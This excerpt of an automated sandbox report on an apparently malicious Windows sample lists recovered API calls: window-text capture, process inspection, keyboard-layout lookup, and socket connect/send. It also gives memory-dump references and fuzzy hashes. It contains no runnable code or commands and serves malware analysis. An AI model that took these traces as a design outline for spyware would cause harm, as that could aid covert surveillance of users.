                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A9F: RtlAllocateHeap.NTDLL(00000000,1000A5B7,?), ref: 10015AD1
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10019674
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10019687
                                                                                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10019696
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(00000000,?,00000000,0283636D,02835713,00000000,?,02832249,?,?,02831D66,00000000,?,?,00000000), ref: 02835B7F
• _free.LIBCMT ref: 02835BB4
• _free.LIBCMT ref: 02835BDB
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02835BE8
• SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02835BF1
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• GetLastError.KERNEL32(1000A5B7,1000A5B7,?,100160F1,10015AE2,?,?,1000C7AC,?,?,?,?,?,1000A4CA,1000A5B7,?), ref: 10016B05
• _free.LIBCMT ref: 10016B3A
• _free.LIBCMT ref: 10016B61
• SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B6E
• SetLastError.KERNEL32(00000000,?,1000A5B7), ref: 10016B77
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Process$CloseHandleOpen$FileImageName
• String ID:
• API String ID: 2951400881-0
APIs
• lstrlenW.KERNEL32(?,?,?,?,?,028310DF,?,?,?,00000000), ref: 02831E9A
• lstrcatW.KERNEL32(?,?,?,028310DF,?,?,?,00000000), ref: 02831EAC
• lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EB3
• lstrlenW.KERNEL32(?,?,028310DF,?,?,?,00000000), ref: 02831EC8
• lstrcatW.KERNEL32(?,028310DF,?,028310DF,?,?,?,00000000), ref: 02831ED3
Memory Dump Source
• Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
• Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: lstrlen$lstrcat
• String ID:
• API String ID: 493641738-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: aee7593d19bb22d1c699c7e553435ad0309b6084de486b1e63643aa47f675f8b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 73376c55d2c24ea2198ab7228d6246ab143883400acf81de612aef5ff8f474d8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aee7593d19bb22d1c699c7e553435ad0309b6084de486b1e63643aa47f675f8b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0892E5401107AD6223729AC85E7F777CEFC5F60B040419F90CC3190DBA5585296F5
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7C5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7D7
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7E9
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F7FB
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044F80D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028391D0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028391E2
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028391F4
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839206
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02839218
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a29d8fd231ee54ae4b684a98b32803df25dc5ecb20f9511891244b6182141d90
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 502baa8ff46667ea54ef4f04da4814033c38f3f0b2ae27e78e1195ecf13d5ac8
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a29d8fd231ee54ae4b684a98b32803df25dc5ecb20f9511891244b6182141d90
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13F0627E964640E78632EB58E5C4C1A7BEAFA047183B40C45F84DD7540DB78F890CAD0
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCAD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCBF
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCD1
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCE3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001CCF5
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 705fac4b2ef0ed0d18e498dac5b3377924e7d1501aba8971cd3dfab6f4dcb135
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DF06D31408A189BC640CB68E9C2C1A33F9EF88B917AC4809F48DDF500CB31FDC28AA4
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0283536F
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835381
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835394
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028353A5
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028353B6
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ad5328e122a0cc4dd3bccbeff387f55412891bbffd1e0e1c48362ef206eb3e89
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cb825a046e8dc5a326cc9cf13627d0e445c18310d06b0c973df9534c402e714d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad5328e122a0cc4dd3bccbeff387f55412891bbffd1e0e1c48362ef206eb3e89
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14F0547CCA4614DB86166F28B5414083BF6B71DB143650E86F814D32D0DB390521CFC1
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10015885
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10015897
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100158AA
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100158BB
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100158CC
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ce460e5bac6ae8aad040ed738a165eee73e0f07a81d148bf5aaa982fd25e43d9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADF03074844A35DBE601EF549CC1C1537A0FB487113BD4A4AF4506E271C732A6838F82
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005A13
                                                                                                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 10005A1D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c31bbaabfe33cba66093c9bc0617cae6cf84ad75179dcb5b20fe35c44385c536
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1f1fc70b04df716a51afbffcc927e8f2192dc69e1f8a2574b42c8594fe6aa3ea
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c31bbaabfe33cba66093c9bc0617cae6cf84ad75179dcb5b20fe35c44385c536
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4E15075A0020ADBDB20CF48D5C099FB7B6FF84392B204529E8459B218DB32FE55CBE1
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-4289949731
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
  • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (FG
• API String ID: 3142014140-2273637114
APIs
• _strpbrk.LIBCMT ref: 0044D4B8
• _free.LIBCMT ref: 0044D5D5
  • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,?,?,?,00414BBD,?,00000000,00000000,?,0043A856,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
  • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A888
  • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000), ref: 0043A88F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 10005B96
• std::_Xinvalid_argument.LIBCPMT ref: 10005BA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,007E5980,00000010), ref: 004042A5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
